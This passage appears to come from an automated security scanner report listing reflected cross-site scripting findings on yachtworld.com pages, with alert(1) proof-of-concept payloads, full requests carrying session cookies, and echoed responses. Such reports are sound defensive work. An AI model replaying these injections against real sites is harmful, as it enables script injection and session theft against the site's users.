yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:26:04 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<script>alert(1)</script>cc1cf759883/boats.header.html:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/galatiyachts14df6-->
...[SNIP]...

3.440. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The value of the id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5b8d'%3balert(1)//42acd5e65a8 was submitted in the id parameter. This input was echoed as d5b8d';alert(1)//42acd5e65a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/pl_boat_detail.jsp?&units=Feet&id=2223519d5b8d'%3balert(1)//42acd5e65a8&lang=en&slim=broker&&hosturl=starlingmarine&&ywo=starlingmarine& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.2.10.1296155835; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296155874806%7C1298747874806%3B%20s_lv%3D1296155874808%7C1390763874808%3B%20s_lv_s%3DFirst%2520Visit%7C1296157674808%3B

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 27 Jan 2011 19:38:28 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 18894

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<br>'+ 'ExceptionMessage: For input string: "2223519d5b8d';alert(1)//42acd5e65a8"<br>
...[SNIP]...

3.441. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91067"><script>alert(1)</script>3f72445dc2d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/pl_boat_detail.jsp?&units=Feet&id=2047906&lang=en&slim=broker&&hosturl=starlingmarine&&ywo=starlingmarine&&91067"><script>alert(1)</script>3f72445dc2d=1 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.1.10.1296155835; s_pers=%20s_nr%3D1296155836661%7C1298747836661%3B%20s_lv%3D1296155836663%7C1390763836663%3B%20s_lv_s%3DFirst%2520Visit%7C1296157636663%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:38:55 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 11979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
<a href="/core/listing/photo_gallery.jsp?slim=broker&lang=en&ywo=starlingmarine&hosturl=starlingmarine&units=Feet&id=2047906&91067"><script>alert(1)</script>3f72445dc2d=1&back=/core/listing/pl_boat_detail.jsp&boat_id=2047906">
...[SNIP]...

3.442. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [slim parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The value of the slim request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61bcb"><script>alert(1)</script>a4d63d652b7 was submitted in the slim parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/pl_boat_detail.jsp?&units=Feet&id=2223519&lang=en&slim=broker61bcb"><script>alert(1)</script>a4d63d652b7&&hosturl=starlingmarine&&ywo=starlingmarine& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.2.10.1296155835; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296155874806%7C1298747874806%3B%20s_lv%3D1296155874808%7C1390763874808%3B%20s_lv_s%3DFirst%2520Visit%7C1296157674808%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:38:34 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 14131

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
<A href="/core/listing/pl_display_photo.jsp?slim=broker61bcb"><script>alert(1)</script>a4d63d652b7&ybw=&boat_id=2223519&boatname=33%27+Palmetto+33&photo_revised_date=1276101717000&photo_name=Photo+2&photo=2&hosturl=starlingmarine&&ywo=starlingmarine&">
...[SNIP]...

3.443. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [slim parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The value of the slim request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38520\'%3balert(1)//6db13835044 was submitted in the slim parameter. This input was echoed as 38520\\';alert(1)//6db13835044 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /core/listing/pl_boat_detail.jsp?&units=Feet&id=2223519&lang=en&slim=broker38520\'%3balert(1)//6db13835044&&hosturl=starlingmarine&&ywo=starlingmarine& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.2.10.1296155835; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296155874806%7C1298747874806%3B%20s_lv%3D1296155874808%7C1390763874808%3B%20s_lv_s%3DFirst%2520Visit%7C1296157674808%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:38:36 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 13960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
<a href=\'/core/listing/pl_display_photo.jsp?&hosturl=starlingmarine&&ywo=starlingmarine&slim=broker38520\\';alert(1)//6db13835044&boat_id=2223519&boatname=33%27+Palmetto+33&photo_revised_date=1276101467000&photo_name=Photo+1&photo=1&url=\'>
...[SNIP]...

3.444. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [slim parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The value of the slim request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9c2e4'><script>alert(1)</script>76c7183d2c0 was submitted in the slim parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/pl_boat_detail.jsp?&units=Feet&id=2223519&lang=en&slim=broker9c2e4'><script>alert(1)</script>76c7183d2c0&&hosturl=starlingmarine&&ywo=starlingmarine& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.2.10.1296155835; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296155874806%7C1298747874806%3B%20s_lv%3D1296155874808%7C1390763874808%3B%20s_lv_s%3DFirst%2520Visit%7C1296157674808%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:38:34 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 14132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
<a href='/core/listing/pl_display_photo.jsp?&hosturl=starlingmarine&&ywo=starlingmarine&slim=broker9c2e4'><script>alert(1)</script>76c7183d2c0&boat_id=2223519&boatname=33%27+Palmetto+33&photo_revised_date=1276101467000&photo_name=Photo+1&photo=1&url='>
...[SNIP]...

3.445. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [units parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The value of the units request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fdb8d'><script>alert(1)</script>af85dfb6474 was submitted in the units parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/pl_boat_detail.jsp?sponsored=true&units=Feetfdb8d'><script>alert(1)</script>af85dfb6474&checked_boats=2212114&slim=broker&&hosturl=denisonyachtsales&ywo=denisonyachtsales HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:27:59 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
<a href='/core/listing/pl_boat_full_detail.jsp?slim=broker&boat_id=2212114&ybw=&hosturl=denisonyachtsales&&ywo=denisonyachtsales&&units=Feetfdb8d'><script>alert(1)</script>af85dfb6474&access=Public&listing_id=64851&url=&hosturl=denisonyachtsales&&ywo=denisonyachtsales&'>
...[SNIP]...

3.446. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [ywo parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The value of the ywo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ec2a"><script>alert(1)</script>c33a2ecf3f6 was submitted in the ywo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/pl_boat_detail.jsp?sponsored=true&units=Feet&checked_boats=2212114&slim=broker&&hosturl=denisonyachtsales&ywo=denisonyachtsales4ec2a"><script>alert(1)</script>c33a2ecf3f6 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:30:46 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluster
...[SNIP]...
ee+Center+Console+Factory+Built+Tower+like+Intrepid+contender+regulator&photo_revised_date=1280056355000&photo_name=Starboard+Stern&photo=20&hosturl=denisonyachtsales&&ywo=denisonyachtsales4ec2a"><script>alert(1)</script>c33a2ecf3f6&">
...[SNIP]...

3.447. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp [ywo parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_detail.jsp

Issue detail

The value of the ywo request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2688e'><script>alert(1)</script>fce754dc703 was submitted in the ywo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/pl_boat_detail.jsp?sponsored=true&units=Feet&checked_boats=2212114&slim=broker&&hosturl=denisonyachtsales&ywo=denisonyachtsales2688e'><script>alert(1)</script>fce754dc703 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; 